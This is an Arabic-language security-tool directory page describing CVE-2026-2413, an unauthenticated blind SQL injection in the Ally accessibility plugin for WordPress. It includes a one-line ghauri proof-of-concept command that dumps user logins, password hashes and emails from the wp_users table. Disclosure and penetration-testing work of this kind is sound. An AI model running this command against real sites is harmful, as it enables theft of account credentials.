Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-2413 — Ally – إمكانية الوصول وسهولة الاستخدام على الويب <= 4.0.3 - حقن SQL غير مصادق عليه عبر مسار URL | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2026-2413
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubrandomrobbiebf/cve-2026-2413

CVE-2026-2413

Ally – إمكانية الوصول وسهولة الاستخدام على الويب <= 4.0.3 - حقن SQL غير مصادق عليه عبر مسار URL

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-2413

Ally – Web Accessibility & Usability <= 4.0.3 - حقن SQL غير مصادق عليه عبر مسار URL

الوصف

إن إضافة Ally – Web Accessibility & Usability الخاصة بووردبريس معرّضة لحقن SQL عبر مسار URL في جميع الإصدارات حتى 4.0.3 وما يتضمنه. يعود السبب إلى عدم كفاية الهروب (escaping) لمعامل URL المقدم من المستخدم في طريقة get_global_remediations()، حيث يتم ربطه مباشرة في جملة SQL JOIN دون تعقيم مناسب لسياق SQL. وفي حين يتم تطبيق esc_url_raw() لسلامة الرابط، إلا أنه لا يمنع حقن المحارف الوصفية الخاصة بـ SQL (الاقتباسات المفردة، الأقواس). وهذا يتيح للمهاجمين غير المصادقين إلحاق استعلامات SQL إضافية بالاستعلامات الموجودة بالفعل، والتي يمكن استخدامها لاستخراج معلومات حساسة من قاعدة البيانات عبر تقنيات حقن SQL العمياء المستندة إلى الزمن (time-based blind SQL injection). ويجب أن تكون وحدة المعالجة (Remediation module) مفعّلة، الأمر الذي يتطلب ربط الإضافة بحساب Elementor.

التفاصيل

  • النوع: إضافة
  • المعرف (Slug): pojo-accessibility
  • الإصدار المتأثر:
  • درجة CVSS: 7.5
  • تقييم CVSS: مرتفع
  • متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE: CVE-2026-2413

إثبات المفهوم

root@kitploit:~
ghauri -u "http://localhost:9001/x*" --technique=E --dbms=mysql --batch --ignore-code 404 --skip-urlencode --prefix="'" --suffix="OR'" -D wordpress -T wp_users -C user_login,user_pass,user_email --dump
تنزيل الأداة